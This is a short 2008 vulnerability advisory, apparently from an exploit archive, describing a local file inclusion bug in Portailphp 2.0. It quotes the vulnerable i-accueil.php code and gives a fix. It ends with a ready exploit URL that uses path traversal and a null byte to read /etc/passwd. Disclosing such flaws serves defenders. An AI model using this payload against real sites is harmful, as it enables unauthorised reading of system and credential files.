portailphp-lfi.txt
Posted on 16 December 2008
[START] ######################################################################################### [0x01] Informations: Script : Portailphp 2.0 Download : http://www.safari-msi.com/portailphp/mod_file/upload/PortailPHP-v2.0.zip Vulnerability : Local File Inclusion Author : Osirys Contact : osirys[at]live[dot]it Website : http://osirys.org Notes : Proud to be Italian Greets: : XaDoS, x0r, emgent, Jay, str0ke. Expecially to: AlpHaNiX ######################################################################################### [0x02] Bug:[Local File Inclusion] ###### Bugged file is: /[path]/i-accueil.php [CODE] <?php /* PORTAILPHP */ echo "<table width='100%'><tr><td>"; echo "<img border='0' src='themes/" . $_SESSION["App_Theme"] . "/ico-fleche01.gif' alt=''> Bienvenue sur <strong>$App_Me_Titre</strong><br /><br />" ; include("$chemin/mod_news/index.php"); echo "</td></tr></table>"; ?> [/CODE] $chemin is not declared, so we can set its value from GET. [!] FIX: Just declare $chemin, or don't include it, becouse it's not necessary. i-accueil.php is in the / path, like /mod_news/index.php. Secure include: include("/mod_news/index.php"); [!] EXPLOIT: /[path]/i-accueil.php?chemin=[local_file_to_include] ../../../../../../../../../../../etc/passwd%00 ######################################################################################### [/END]
